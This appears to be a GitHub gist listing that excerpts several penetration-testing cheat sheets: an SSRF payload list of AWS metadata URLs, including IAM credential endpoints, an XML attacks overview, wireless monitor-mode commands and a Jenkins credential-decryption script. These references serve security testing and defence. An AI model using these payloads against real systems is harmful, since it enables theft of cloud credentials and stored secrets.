Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
I may be slow to respond.

Wen Bin kongwenbin

💭
I may be slow to respond.
View GitHub Profile
@jhaddix
jhaddix / cloud_metadata.txt
Last active Aug 12, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@mgeeky
mgeeky / xml-attacks.md
Last active Aug 3, 2020
XML Vulnerabilities and Attacks cheatsheet
View xml-attacks.md

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.


@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created Jul 2, 2016
Wireless Penetration Testing Cheat Sheet
View Wireless Penetration Testing Cheat Sheet.md

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@tuxfight3r
tuxfight3r / jenkins-decrypt.groovy
Created Sep 23, 2015
Decrypting Jenkins Password
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
#go to the jenkins url
http://jenkins-host/script
#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'
You can’t perform that action at this time.